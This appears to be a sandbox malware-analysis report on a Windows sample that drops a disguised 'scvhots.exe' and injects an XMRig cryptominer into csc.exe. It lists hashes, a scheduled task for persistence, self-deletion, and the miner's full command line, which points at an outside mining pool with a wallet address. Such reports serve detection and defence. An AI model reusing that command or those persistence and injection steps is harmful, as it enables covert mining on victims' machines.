Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03/06/2024, 08:42
Static task
static1
Behavioral task
behavioral1
Sample
91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
Resource
win7-20240221-en
General
-
Target
91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
-
Size
2.2MB
-
MD5
91290227566049adfd31ecd4c1296b92
-
SHA1
002b9071306530c3915cf27590b8453aa871125d
-
SHA256
3295d5e6746be0ceb6557380a4b57e6606e8fad051279a0ff78b3236d7b91bf6
-
SHA512
427c5c9d5d1c5e3c19dcd42dd15a386d536e3d6ed7ce7a954bef751add0581a35392c33c3e986116f779dda24072d92a992eef1953e9e58496ab432516a2e509
-
SSDEEP
49152:z+5V5bSIh5Robl+Gd6pzGg90o0TickQ7B7Atl9hpHAKf:K75bSynocSQqgqZWjQt7Alfzf
Malware Config
Signatures
-
XMRig Miner payload 15 IoCs
resource yara_rule behavioral1/memory/920-95-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-96-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-97-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-98-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-99-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-100-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-101-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-102-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-103-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-104-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-105-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-106-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-107-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-108-0x0000000000400000-0x000000000057C000-memory.dmp xmrig behavioral1/memory/920-109-0x0000000000400000-0x000000000057C000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2632 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 2492 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 1936 scvhots.exe -
Loads dropped DLL 2 IoCs
pid Process 2632 cmd.exe 2492 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe -
resource yara_rule behavioral1/memory/920-93-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-79-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-95-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-94-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-96-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-97-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-98-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-99-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-100-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-101-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-102-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-103-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-104-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-105-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-106-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-107-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-108-0x0000000000400000-0x000000000057C000-memory.dmp upx behavioral1/memory/920-109-0x0000000000400000-0x000000000057C000-memory.dmp upx -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1936 set thread context of 920 1936 scvhots.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2904 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2456 timeout.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 920 csc.exe Token: SeLockMemoryPrivilege 920 csc.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2004 wrote to memory of 2256 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 28 PID 2004 wrote to memory of 2256 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 28 PID 2004 wrote to memory of 2256 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 28 PID 2004 wrote to memory of 2256 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 28 PID 2004 wrote to memory of 2632 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 30 PID 2004 wrote to memory of 2632 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 30 PID 2004 wrote to memory of 2632 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 30 PID 2004 wrote to memory of 2632 2004 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 30 PID 2256 wrote to memory of 2832 2256 cmd.exe 32 PID 2256 wrote to memory of 2832 2256 cmd.exe 32 PID 2256 wrote to memory of 2832 2256 cmd.exe 32 PID 2256 wrote to memory of 2832 2256 cmd.exe 32 PID 2632 wrote to memory of 3024 2632 cmd.exe 33 PID 2632 wrote to memory of 3024 2632 cmd.exe 33 PID 2632 wrote to memory of 3024 2632 cmd.exe 33 PID 2632 wrote to memory of 3024 2632 cmd.exe 33 PID 2256 wrote to memory of 2904 2256 cmd.exe 34 PID 2256 wrote to memory of 2904 2256 cmd.exe 34 PID 2256 wrote to memory of 2904 2256 cmd.exe 34 PID 2256 wrote to memory of 2904 2256 cmd.exe 34 PID 2632 wrote to memory of 2492 2632 cmd.exe 35 PID 2632 wrote to memory of 2492 2632 cmd.exe 35 PID 2632 wrote to memory of 2492 2632 cmd.exe 35 PID 2632 wrote to memory of 2492 2632 cmd.exe 35 PID 2632 wrote to memory of 2456 2632 cmd.exe 36 PID 2632 wrote to memory of 2456 2632 cmd.exe 36 PID 2632 wrote to memory of 2456 2632 cmd.exe 36 PID 2632 wrote to memory of 2456 2632 cmd.exe 36 PID 2492 wrote to memory of 1936 2492 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 37 PID 2492 wrote to memory of 1936 2492 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 37 PID 2492 wrote to memory of 1936 2492 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 37 PID 2492 wrote to memory of 1936 2492 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe 37 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38 PID 1936 wrote to memory of 920 1936 scvhots.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\zbe20246384251130.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\schtasks.exeSchtasks.EXE /delete /tn "Maintenance" /f3⤵PID:2832
-
-
C:\Windows\SysWOW64\schtasks.exeSchtasks.EXE /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20246384251130.xml"3⤵
- Creates scheduled task(s)
PID:2904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\zb20246384251130.bat" "2⤵
- Deletes itself
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\chcp.comchcp 12513⤵PID:3024
-
-
C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Users\Admin\scvhots.exe"C:\Users\Admin\scvhots.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe -a cryptonight -o pool.supportxmr.com:80 -u 453ys3CV57Nbg2XCekHZdJRHyGd4uSB1oTuWEs5btLfsYDKE71XAmUVYybZXVBeZDS34zWxkWL6pNRNPPXHChq6CGwNa5j4 -p cpu --av=0 -t 1 --donate-level=15⤵
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak3⤵
- Delays execution with timeout.exe
PID:2456
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
680B
MD5a8392a9f77078d7955410a1bf5fa9a82
SHA18963744692735559bce6322dcdb9a5f67fd952ba
SHA256eff1ea1ce1e42d01c25fa203cb2f43316602d2cf51b88ef60ebd6679e57ddb11
SHA5128dd07d99cafbe2bce9402f5eae33bf46e4b1f93b73b5815b5957f444be8c851f27e1143ef7923e86c6b4059f3ba4af8bd1bd37f625cad8c6005c12f75f708777
-
Filesize
198B
MD598228d10daef5f91cccf5e0fb25f130e
SHA1f94ed868eaee3015706b274d7a30f0c7086dc215
SHA256d0d065878458a486bb9b453884cce4f0e13b83950f374cb765e2bbc9610995ff
SHA51297eaf08ae5765f90734c762ddd77a196ca86a73f0660c4e8b7970e202487a471196d7ed186ab60b79dffc90d23ef3fa1ea3e44e515f22fe34a965cab09fc95d3
-
Filesize
2.2MB
MD5f4cdf35f34063c1b0377008ae133e79f
SHA1935d7e86cfb4d7b853a6e51f7e4ab938a0a46136
SHA256317a902c2d5a9307e87f7e751aff4745379727fa99c9900d387f0eadd4fbbe43
SHA5127c7216b2ed6ca7381a6ff0cc66b04e20720a9bb9b24cedfaa0158204d6bb6f5937dc4ee6c9b3529fbcebf002415792bd7de81cecbbde9c404ae4e709893a1e9f
-
Filesize
1KB
MD5bae07d90cc9071ee0f4d37b3f89d6a57
SHA190b6121e67985028c970bb3b5553324a4f9f611d
SHA256742b5a10cb78290d18a962a81436a61d4d5124e748a5c59681684a924d6545d8
SHA5129a5a143b91cecdda0e2924c467b30b856b0ae501f5c67746ea9c2b60b40666bbe9d101b806740489f2ba92da7a0165fbb44e536c6aedf6002406f506a3c4d9a8